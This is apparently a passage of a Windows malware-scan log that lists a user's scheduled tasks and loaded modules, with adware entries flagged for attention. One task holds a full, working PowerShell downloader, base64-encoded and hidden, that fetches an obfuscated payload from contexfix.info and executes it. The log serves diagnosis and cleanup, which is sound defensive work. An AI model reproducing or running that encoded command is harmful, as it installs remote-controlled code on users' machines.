Task: {4CB26727-2B66-44ED-9CB5-3BFE2BBD53F5} - System32\Tasks\{20EB2353-BC38-4995-9A61-A8D24A2C8361} => pcalua.exe -a C:\Users\Charlie\Downloads\chromeinstall-8u31.exe -d C:\Users\Charlie\Downloads
Task: {4F27F764-3DF6-41E2-B13E-C181E52BD9FE} - System32\Tasks\{780E0B47-7A78-0A0E-0911-0B79050F110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGMAbwBuAHQAZQB4AGYAaQB4AC4AaQBuAGYAbwAvAHUALwA/AGEAPQA2AEUARQB4AFkAdgAtADkAMQBfAHAANQBvAHUAZwB6AEIAbwAyAGsAbwBlADIAQwBhAGoARQBmAHEAVwBQAHEAUwBFADUASQBXAHEAMQBtAE8AWQBVAFEATABRAEIAdQBhAEMANQBDAGYAMAB5AFcAZwAwAFUASABfAE8AcgAwADQAbQBMAGwAVAAxAGwAaABqAFQATQBtAGEAUQBHAGUARgBaAHMAZQBXAGYARQB5AGgAVQBnAEkANABoAFgAcgA1AHgAagBCAHcATAB1AGUAcABWAGsAeQBZAHoAUwBnAHYASQBTAEcARgBFAFoASQBTAFgAZwBNAEEAcgB3AFMAQQBYAGQAbQBIAGgAcwBiAGYATQBRAFEAVgBDAFYAVgBiAF8AVQBNAEIANgB1AE4AdABZADcAcwBLAHkAMQA3AF8AVQA3AEwAbwB4AFEAegBrAEsAeABJAGYAMwBQAFMAcAA4ADMANwAwAHYAUgBVAGIAbgBBAHQAQQBVAEIATABWAGUAbQBVAHMAZQBxAEkAdwB5AHIATwBLAGQAYgBaAG8AOABaAHgAMgBfAGwAWgAzAGwAMQBVAE0ATQBUAG4AWQBpAHUAdgBKAC0ANgA1AEUALQBsAFcAeAAzAEgAMAB4AE4ARQAzAHoAMAAyAEMAQQBiAEkAUgBnAHUAZgAyAFcAMQBGAEwAbABDAGsAQwAtADYATgBmAE0ALQBkADMAcwBkAHgAaABjAFAAdABqAGEAUABPAEYAdABCAHAAdgBCAC0ALQBIAGIARwB4AG0ATQBTAEgAagAxAGEAOQByAGgAYgBNAGcAbwBUAEYAbgBVAGUAXwA5AFAAeABqAC0AaABlAFUAYgB3ADUAWQBrAHQAQQAyAHkATQBtAEkAdABDAEIAawBIAHgAUABZADkASgBXAFgASwBJAC0AVgBfAEMASQBpAHMAQQB0AE4AcgBLAGgAWAA2AGoASgB5AFgAZQBKAHQAUABkAEsAUABOAGkAegA1AG4AMQBCAEgAbgB1AHYAVABrAHgAdgB6AFcAWQBuAFEANwBZAFcAdQBrADQAQwBtAEUAMQBvAGwAeABGADEAcgBJAEQAbgA5AFUARABTAFgAYgBxAGcAYQBsAGUASQBNAGYAZwBlAEYAbgBNAGwAVwBSAEgAaABJAFkAXwBPAHUAbQA2AG0AQQAxAHcAQQBKAFcAVgA2AHMASQBHAFQAMwBYAGUASgBWAFQAawBkADUAUQBWAFkAcgBlADYAcQByAHcASQBNAHIAbAB1AFQANAAtAF8AMAA5ADMANgBMAEwAaQBxAEgAdQBjAG4AUwBWAF8AZQBtAE8AYwBEAHQAYwBLAEEAbQBTAEoAWgBNADQAZgBLADMAMABoAGsARQBtAG4ANwA3AHAAYQB6AHYAWgBBADYASwAtAFEAZwBCAG8AYgBkAHoATABzAGYAdQBmAE0ANgBQAEUAMwBhADIATABIAE4AWQBxAGsAQwA0ADAAdwBSADUAZgA0ADUAMwBNAG8AUABnAC0AZwAxAGIAVwBVAGQANgBXAFoAaAAzAHkAcABxAC0AZgBVAGsARQA5AHYASQBkAHoAYQBlAHYATwBaAFMAMgBSAE0AdgB3AHMAdQBjADEAeABOAGgAZABDAEkAQgA5AGQARQBDAEEAUAA5ADgAegBYAHoAVgBUAG8AaABMAEwAOAB1AG8ALQBuAG8AMABHAGYARwBkAFQATgBaAHoAQQBZAE4ARABDAFoAcQBnAFgAUwBJAHUAVQA0ADcAVABWAE4AawAxAFAAegBKAHUAaQBhADMAVABsAFUATgB0AG0AQQAtAFMAMwBQAE8AVwBmAEsAUgBVAFUATQA1AGYAcwA4AEcAVgBkAGIAUwBIAG4AZQB1AFEARwBTADYAUQB3AGsAUQB1AFcAaABnADEAcwB6AGUAcgBXAHgAdAB3AHoATQBRAEkASgA4AG0ALQAtAHYASQBRAEIAQgBJAGgAUgBDAGsARQBpAEYASwBzAE0AaAA2AGYAVwBlAGMANQBFAFcAYQBnAG0AcwBCADgATwBMAGgAcAB2ADYAawAxAEoAQwBaAEUAQwA0ADMARgAtAFAAZwBQAHcAdQB1AGYAbwBiAEwANABaAEgANwBJAHoAcQBIAE4ATQB4AGYAeQBSADYAbABhAFgAUABWAHAAZwBrAGoAegBjAEMAOABNAFcAWQBjADAANgBVAHMAbQBvAHgARgA0AHgAcQBLAEkAbQBGADgAUQBvAHUATABNAHMAQwBRAGYAZgB3AGkASABZAEcAeABfAEUAWQB5AEYAYgBhAE4AcQBfAHYAWQAxAGoAOABuAFQAbABhAGUAawA1AG8AcwBuAE8ATwBCAGEAcgBEAEMAJgBjAD0AcAA5AHoAbwByAHQARgBvADUAVQA2AFYASwB5AGwAbAA2AFYAZAAwADcARgAtADkAQQBiADYARwBoAGIAawBHAFoAcABwAGoAZwBJAFMAaQBoAGEAQgBNAHEAbAA2AHUAeABVAGgAQwBTAFgAZwBZADAAaQBLAHAAYgB4AG8ASgB4AGoAegBoAHEAcwBMAFQAdwB6AGUAQgBKAGgAegBUADQANQBPAGoAVABSAG8ASgA5AF8AUwBkAHIAUwBLAHoAOQA5AFgAQQB0AGkALQB2ADMAQQBIAHAATAAxAFkAWABfAC0AXwA0AFcASQBlAHoATABhAGQAaABDAFkAOQBJAGwAUwB4AG8AQgA1ADQASABiAEcAZgBBAGYATABIAGMAZgBDAE4AdgBuAGwAbgBzAEIAVAB3AGIARQB6AGwATQBnAFIAUwBpADAAbgBQAGgAMABkAEUAawBCAG8AZwBvADIAOQBrAGoAZgBtADQAeAAzAEMAQgAxAE4ARgBqAGwAdABwAE0AVQBoADUAWQBlAG4AVwA0AHoANAA1AHEALQB0AFoARwAxAHYAQwAxADAAVwBwAHcAYQBiAHgAOQBRAHUAUwBmAHUAeABWAEwARQBSAE8AMQA3AC0AMABEAFYAZQBHAE4ANABmAHYAMwBmAGcAVgBfAEYAZgBQADgAZQAxAE0AYgBDAHoAUgBnAHgAaQBRAFAALQBiAEwAYgB1AHcAcgBtAE4ASAAxADkAQgB0AGgATQByAEUATQBwAEUASQBvADQAMABSAFoAQwBWADYAWQBHADYAMQBTAGwAOABhADMAOQBzAGEAdgBtAHIAXwBfAFoAaQB5ADkARwBwAGIATgBrAHkAWgBCAEIAdgBvAHgAegB6AEEAdwBrAFIAZQBxAFIAOABiAFcAdgB1AEgAUgBEAHYAZwA4AC0AYQBOAHIAaQA0AFgAMABMADUARwBqAFUAdABzAFMAWQA2AHQAOQBRAHUATwBUAHEATQBOAEEAWAAxAGUAdwByAE0AawBfAGEARwBiAHYATQA4AHoAXwB1AGoAcQBoAHQATAA4AGQAeQBSAEIANgAwAFMAZABYAEwAUgA4AHAAcgBkAGoAWQBDAHQAMwB6AEUAZABUAHIARAA0AGoAUwBsAEQAVwBWADQAWQAtAEQAbABwAGMANwBZAEgAawBtAGUATABxAHcAWABJAGkAbQB2ADcARQBWAFEAWQByAHUAegAyAFkAVwBnADgAbwB1AGsAQQA3AHkANQBoAHEAWgB5AGQAcQBZAEsAQwAwAFcAZwBjAHUATABGAFIAawA2AGQARABfAC0AYwB3AG8ANABIAHMAMQBmAHIAWABlAFQAUABxAFkAcwBJAFgATgBQAG0AMQBNAEEAegAzAHgAUgBnADMAVQA4ADQAdQBnAGMAbABPAEMAOAByAG8ATQA1AFYAVwBfAEsAVgByAEoAYQBsADMAWQBuAHcAbgBGADgALQAyAFkAZwBoAHkAMABKAEgANwBHAHYAYQBrAEwAaQBTAHAAVwBQADIAXwAtAFcATABPAHkAZQBfADUAWgA5AGkAcQBhAEQAWQBBAHoAdwBkAG4AUAB6ADMAagBZAE8ATABQAHYAQgB3AEcAbQBtAEMAMgBHAG4ATABCAGgAbAB3AGMAVwBFAGkAMwA4AGQATABtAEQAZgBWAE8AUABLADkAUABEAEgAWgBOAGQAawBvAHoAYQBTAGQAYQB4AHAAMQBZAFUAaAAzADEAZQBjAFIAYwB6AFIASwBqAG4AXwBlADgAVABhAHgAbgBMADgAVQBiADcAWAA2AHQARgBHAC0AUQBSAEsAXwBwADEASgA0AGwAUQB2ADkAYQBVAE4AMwBRAEMANwBjAHIAVwBxAHIAUwBrAEwAZwBoAHAAOQBSAEEANABUAFUALQBJAHgAZABwADEAWABwAGQAYgBKADgAMwB5AHAAaABfAEQAdABTADEARQBjAGMAUQBxAHYAZABGAFAAVQBRAFAAYgB2AHgAUQA0AHkAUAB2AE0AVABhAEIASgBEAEwAUgB1ADQAawAtAE0AdQAyAC0AUgBvAEwAeQBJAEgANQB3ADIAZABiAGgAUAA0AGsAaABiAEkAbgBvAFQAeABSAE4ARQBVAFgANgA1ADEAOABlAHIARABCAEQAQgBNAFIAUgBRAEgAcQBBAEIATQBUAFEAMwB1AFoASQA5AGcANQBlAHEATABmAC0ALQBfAEEASQBuAEQAcwBzAEYAVQBBAFYAcQBQAEcAOAB4AEUAVwBPAEQAeQBrAGwAcQB0AC0AVgB6ADcATQBrAHEANABOAFYAMwBqADYAMQAtAEMAOQBwAHEAVABiADYAYgAzAFoAdwBaAEgARQBwAHUAWAAwAEUATgBDAGYAXwBpAHMATgBMAGIAdABpAG8ASAByADkAUAB0ADkAWABjAEoAOABXADQATABfAHIAUwBQAE8AVgA3AGcAeAB2AFgARgBZAFMAbABHAGcARwBpADEAZABYAHcAeQBKACYAcgA9ADQAMAA5ADQAMQA5ADMAOAA4ADMAMwA3ADAAOAA4ADYANwAzADUAIgA7ACQAcwB0AHMAawA9ACIAewA3ADgAMABFADAAQgA0ADcALQA3AEEANwA4AC0AMABBADAARQAtADAAOQAxADEALQAwAEIANwA5ADAANQAwAEYAMQAxADAAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIATABVAFIATgBVAEoAVABHACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {50E6F317-59DB-422A-9B35-05CEE2D58C6D} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2015-01-28] ()
Task: {51C95B35-225E-452C-9301-234846811C7B} - System32\Tasks\Fusion Browser Launch Task => Chrome.exe --sch-launch --docked
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {5AEE6A25-B4D6-49E7-B18D-ABD907487893} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
Task: {64926D10-C113-4849-8364-4A23DB2C3DAF} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\21.0\mcdatrep.exe [2015-08-04] (McAfee, Inc.)
Task: {66CF5B26-85E0-4095-BBD6-31F18B44D146} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000Core => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-30] (Dropbox, Inc.)
Task: {68515BA3-AB7D-4C48-81CD-C3A65A8AC7C1} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {6B93D5BA-BB45-4347-81DF-75BA6966225D} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-03] (Adobe Systems Incorporated)
Task: {89ADF2EF-5764-435C-94D1-418A19E06A10} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {8DBAF71D-D981-4D7F-8D96-90E4F3566220} - System32\Tasks\WebUpdater Task => C:\Program Files\WebUpdater\webupdaterservice.exe [2015-12-30] (Web Updater Media)
Task: {8F71346F-9754-43AE-A404-6A5F027FC396} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2015-12-29] () <==== ATTENTION
Task: {8FF9009A-01AA-4BD7-ADF3-B9B364D804B1} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation)
Task: {B09ED9A5-FF07-413E-8837-759CE1FA36FD} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {B68388AB-C415-428A-B356-E4BFC84963A3} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2015-12-29] () <==== ATTENTION
Task: {B77A26F5-7E7E-4C11-BE1E-955A618C1998} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation)
Task: {C25A0339-CBFA-43B6-A68B-F52402B01256} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {C2DB69D1-5A12-447D-9C4A-D26C1277F20F} - System32\Tasks\HPCeeScheduleForCharlie => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {C85EF2F7-128A-4947-B39D-03AEE0EF3196} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2015-12-29] () <==== ATTENTION
Task: {CE9E7981-1275-407B-BBB4-40497F96FB2C} - System32\Tasks\WebUpdater LaunchTask => C:\Program Files\WebUpdater\webupdaterservice.exe [2015-12-30] (Web Updater Media)
Task: {D173A88A-027B-4BB6-88B4-6D29241A2D6C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000Core.job => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1024156207-2972793060-2867319265-1000UA.job => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForCharlie.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2014-03-28 15:31 - 2014-03-28 15:31 - 02110464 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll
2014-03-28 15:27 - 2014-03-28 15:27 - 00035328 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll
2014-03-28 15:27 - 2014-03-28 15:27 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll
2014-03-28 15:27 - 2014-03-28 15:27 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll
2014-03-28 15:48 - 2014-03-28 15:48 - 00367504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll
2014-03-28 15:48 - 2014-03-28 15:48 - 00712080 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll
2014-10-29 11:03 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2015-10-30 15:03 - 2015-09-01 11:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2013-11-29 00:32 - 2013-11-29 00:32 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll
2013-11-29 00:38 - 2013-11-29 00:38 - 00384128 _____ () C:\Program Files (x86)\Bluetooth Suite\ContactsApi.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00017168 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe
2016-01-10 11:54 - 2016-01-10 11:54 - 00008976 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.Service.Logger.dll
2016-01-10 11:54 - 2016-01-10 11:54 - 00028432 _____ () C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WcfService.dll
2016-01-10 11:55 - 2016-01-10 11:55 - 01983640 _____ () C:\Program Files (x86)\Get-a-Clip\MFLService2.exe
2016-01-10 11:55 - 2016-01-10 11:55 - 00116208 _____ () C:\Program Files (x86)\Get-a-Clip\mflstart.exe
2016-01-10 11:56 - 2015-12-30 09:15 - 21754368 _____ () C:\Program Files\WebUpdater\1.0.24.0\WebUpdater.exe
2016-01-10 11:56 - 2015-12-30 09:15 - 00255488 _____ () C:\Program Files\WebUpdater\1.0.24.0\isa_x64.dll
2016-01-10 11:56 - 2015-07-31 12:37 - 00584704 _____ () C:\Program Files\WebUpdater\1.0.24.0\detection_rules_x64.dll
2015-12-11 12:38 - 2015-10-30 19:59 - 00034768 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00019408 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00022848 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Random.OSRNG.winrandom.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00023352 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Util._counter.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00042296 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Crypto.Cipher._AES.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00116688 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2015-12-11 12:38 - 2015-10-30 19:59 - 00093640 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00018376 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\select.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00019760 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00105928 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32api.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00392144 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2015-12-11 12:38 - 2015-12-08 16:36 - 00381752 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2015-12-11 12:38 - 2015-10-30 19:59 - 00692688 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\unicodedata.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00020816 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2015-12-11 12:38 - 2015-10-30 20:00 - 00109520 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 01737032 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00020808 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2015-12-11 12:38 - 2015-12-08 16:36 - 00020800 _____ () C:\Users\Charlie\AppData\Roaming\Dropbox\bin\_cffi_python_x66cf7a7cx17a72769.pyd
